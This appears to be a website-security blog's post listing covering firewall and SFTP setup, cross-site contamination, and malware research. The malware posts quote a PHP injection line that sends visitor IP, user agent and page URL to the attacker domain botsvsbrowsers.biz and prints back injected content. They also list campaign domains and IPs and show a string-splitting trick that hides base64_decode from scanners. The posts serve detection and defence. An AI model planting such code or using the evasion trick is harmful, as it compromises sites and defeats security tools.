bookmark_borderBlocking HTTP requests via Iptables for a specific domain

In a previous article, we showed how to block specific domains at the DNS level using iptables. Today, we will expand into that and show how to also block HTTP requests for a specific domain (or URL) in there.

Iptables String Matching

Iptables string matching is very powerful and easier to use than the hex-string module we used before. When you specify -m string –string, it will activate the string module and inspect at the packet content for the keyword you are looking for.

Continue reading “Blocking HTTP requests via Iptables for a specific domain”

bookmark_borderLets Encrypt: Unable to install the certificate

You’ve heard it’s important to install Let’s Encrypt (LE). You spin up your Ubuntu 18.04 machine and try to use https://certbot.eff.org/.

You run the command:

certbot –apache -d domain.com

You are greeted with:

Continue reading “Lets Encrypt: Unable to install the certificate”

bookmark_borderHow To List UFW Rules When The Application is Inactive or Disabled

When working on your server you might need to disable the Uncomplicated Firewall (UFW). When doing so you’ll notice it doesn’t display your rules when the application is inactive.

Continue reading “How To List UFW Rules When The Application is Inactive or Disabled”

bookmark_borderWorking with UFW – Uncomplicated Firewall – on Ubuntu

This is not a comprehensive guide to the UFW application.

It is a basic orientation for the UFW application. This should provide insights you’re probably not aware of, but many might assume you already know.

Continue reading “Working with UFW – Uncomplicated Firewall – on Ubuntu”

bookmark_borderHow do you enable SFTP on your Ubuntu server?

SFTP is a file transfer protocol. It wraps the File Transfer Protocol (FTP) inside the Secure Shell (SSH) protocol. This allows the communication to be protected as it moves from one point to another.

PSA: Using FTP is considered an insecure transfer protocol and should be avoided.

This article assumes you are trying to create new SFTP users on your linux machine. In this example we’ll be using Ubuntu 18.04.

Enabling and Creating SFTP users:

To enable SFTP you have to enable it inside your SSH configuration file. It’s often located here: /etc/ssh/sshd_config. Open the file and add the following to the end of the configuration file:

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server
Match group sftp
X11Forwarding no
AllowTCPForwarding no
ForceCommand internal-sftp

Options explained:

OptionDescription
SubsystemAn abstraction layer that allows you to invoke remote commands. In this instance, we’re invoking sftp-server.
MatchAllows you to limit actions in shell, in this instance we’re limiting the actions to a specific group – sftp. Only those users inside the SFTP group will be able to SFTP into the server.
X11ForwardingThis is a special case for remote tunneling. Unfortuantely it can be used maliciously by a bad actor, so it’s recommended your disable unless you know what you’re doing.
AllowTCPForwarding“TCP Forwarding” allows you to encapsulate any other protocol (based on TCP of course) inside an already established SSH connection. There are a lot of reasons for this, but we don’t want to allow SFTP users to use this without appropriate planning.
ForceCommandThe remote system can only execute a set of statically defined commands. Specifying a command of internal-sftp will force the use of an in-process SFTP server that requires no support files when used with ChrootDirectory.

Once you add this to the SSH config file you need to restart OpenSSH:

service ssh restart

Now you need to add new SFTP users, and apply the user to the right group.

useradd -m [newsftpuser] -g sftp

Set the password:

passwd [newsftpuser]

Now you can test your SFTP connection, from a different server:

sftp [newsftpuser]@[serverIPaddress]

Happy SFTP’ing!

Sharing is caring!

bookmark_borderWhat is Cross-Site Contamination and How to Prevent it

If you suffer multiple reinfections and your site is one of many in an account, the odds are high that you’re suffering from cross-site contamination.

Cross-site contamination is when a site is negatively affected by neighboring sites within the same server due to poor isolation on the server or account configuration. This phenomenon is one of the greatest contributors to the VPS/Dedicated/Shared hosting secure or insecure debate.

The greatest contributor to cross-site contamination is what I call soup-kitchen servers. Soup-kitchen servers are those environments riddled with every installation and configuration known to man. It might include 10’s or 100’s of different sites or different platforms (i.e., Drupal, Joomla, WordPress, etc.). The problem isn’t the quantity. They might also include sites in different phases of their lives – development, staging, production.

The biggest culprits of these configurations are agencies, freelance developers, and aspiring hosts.

A Primer in Functional Isolation

The concept of functional isolation is not new but can be difficult to employ. It’s the idea that an environment should be used for only one purpose. A classic example might be using a web server as an email server or vice versa. The general rule of thumb is that using an environment for more than one purpose is bad practice. Theoretical and practical application, however, are always two different things.

Most organizations (individuals) wouldn’t dream of having a server per site, and in many ways it’s impractical. So my recommendation is to break it out by three things: technology, function, and stage.

  • Technology: Don’t mix technologies if you can help it. For instance, don’t deploy Drupal sites with WordPress sites, etc… Each platform is fundamentally different, and it’s easier to harden an environment that is similar than trying to remember what exists in the environment.
  • Function: Don’t mix server functions. If you have an email server, don’t use it as a file server or web server, etc… Use the environment for what it is intended for.
  • Stage: Don’t mix different stages of life for each site. Stages refer to whether it’s in development, testing or production stage. At a minimum, you should have at least two environments – development and production. Three would be ideal (including testing) but for many not as practical (or cost-prohibitive).

The next thing you want to think about – accounts.

Shared hosts have a bad reputation for poor security, but it’s not entirely accurate. While it’s true there have been challenges in the past, we’re talking circa 2010/2011. These days, the problems with shared hosts, are not the shared host themselves, but the one-to-many relationship website owners have with their accounts and sites.

Example: One account has 100 sites under it.

In these configurations, the attacks we’re seeing are not those that are moving laterally between accounts on the shared host, but rather those that are moving laterally within the same account.

It’s important that when you’re configuring your account to create unique users for each site and ensure that the permissions are such that a user can’t move between users on the same account.

Website Firewalls and Cross-Site Contamination

The most frustrating thing for a website owner is when they deploy all the recommended security controls and they continue to get infected. We experience it all the time with customers that have deployed our controls, including our Firewall, and a reinfection happens.

In 9 out of 10 instances, reinfections are occurring because of internal attacks (not external). The challenge with this, however, is that it requires investigation and education.

  • Internal Attacks: Attacks where the bad actor is able to exploit internal weaknesses in the environment to perform nefarious acts (example: cross-site contamination) by moving laterally throughout the environment.
  • External Attacks: Attacks where the bad actor is able to exploit weaknesses remotely to gain access and proceed to perform a nefarious act (example: exploiting a software vulnerability remotely – think SQLi).

Seeing the infection on your site doesn’t mean that it’s the site itself being exploited. If you continue to experience multiple reinfections it’s good to look at your entire environment and see if any of the conditions described above might be contributing to the issues.

The biggest contributors we find when running our reinfection investigations include:

  • Forgotten websites on the same account
  • Misconfigured websites on the same account
  • Websites that have not been secured on the same account

If you’re a website owner and wondering if this affects you, open a dialog with your developer or host and ask them what their approach is to handling multiple websites on the same server and account. Ask them if they are managing other sites on your account and how they can provide you assurances that your site is properly isolated from other neighboring sites. If you continue to experience issues the odds are there is a misconfiguration.

Preventing Cross-Site Contamination

The approach I propose here is simple, cost-effective, and the first step into improving your overall security posture. It will pay dividends in helping reduce the risks associated with cross-site contamination, while also helping streamline your maintenance activities.

Functional isolation is as old a concept as Least Privileged or Defense in Depth, but perhaps the least discussed. I would extend that to encourage you to consider not just Functional Isolation, but Account Isolation as well. Combined, both these will dramatically reduce the threat that is cross-site contamination.

A few last thoughts:

  • If you decide to deploy something like the Sucuri Firewall, make sure that it’s deployed on all sites on the same account, and you’ve followed all the steps to ensure direct access to the server is restricted.
  • If you only care about one site, and not the other 99, then move that one site into its own environment.
  • If you have one server doing all things, stop! Leverage your servers and accounts based on the recommendations I provided above.
  • If you’re a website owner ask questions, become an involved member in the process. Security is your responsibility as much as it is your designers or hosts.

 If you need help with a hacked site or are struggling with cross-site contamination, we offer professional website malware removal services and will protect and monitor your website.

bookmark_borderRevSlider MalFrames – SoakSoak

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, since thelast 2 weeks, it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

  1. soaksoak.ru: First one in the list. We identified more than 100,000 sites redirecting to it.
  2. 122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
  3. ads.akeemdom.com
  4. wpcache-blogger.com: Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
  5. theme.wpcache-blogger.com
  6. phoenix-credit.com: Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

bookmark_borderFake botsvsbrowsers domain

The domain botsvsbrowsers.com is quite popular and used for comparing user agents (browsers) and seeingif a specific request is from a valid user or a bot.

And piggy backing on their popularity, the bad guys created a domain botsvsbrowsers.biz (.biz versus .com) tobe used as a command and control server on spam SEO campaigns.

This is the code we are seeing on compromised sites:

echo file_get_contents(“http://botsvsbrowsers. biz/Statistic/ Stat.php?ip=’. urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=”.urlencode($sUserAgent)…
‘&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&addcheck=’);

Which basically contacts botsvsbrowsers.biz/Statistic/Stat.php on every page load, giving the client IP address, and URLand it decides what to inject to that user. Most of the time we are seeing just plain SPAM, but they are probably servingother malicious code as well.

So if you see any content being loaded from botsvsbrowsers.BIZ (or the IP address 46.165.222.93), you know it is malicious.

bookmark_borderPHP.net blacklisted by Google

We woke up this morning to many reports and people asking why the PHP.net site is being blacklisted.We did not get a chance to analyze it while it was compromised, but it seems that one of their javascript files (static.php.net/www.php.net/userprefs.js) was modified to inject a malicious iframefrom http://lnkhere.reviewhdtv.co.uk/stat.htm.

That’s the supposed bad code: http://pastebin.com/raw.php?i=nAess4xL

It seems the PHP team fixed it already and requested Google to clear it. If anyone has more info, we would love to hear it.

bookmark_borderDo you still look for base64_decode?

A common keyword that people use to find hidden injections on web sites is base64_decode. Youoften see injections that look like eval ( base64_decode or eval ( gzinflate ( base64_decode beingused by the attackers.

So most web security tools have some signatures to look for it (specially on WordPress).

Well, the attackers do know about it as well and we are starting to see some interesting variations for it. Forexample, instead of injecting base64_decode, they are injecting as a variable:

$g___g_=’base’.(32*2).’_de’.’code’;

And instead of calling out base64_decode directly, they are using base + 32*2 + decode. A simple trick that allowsthen to bypass many security filters.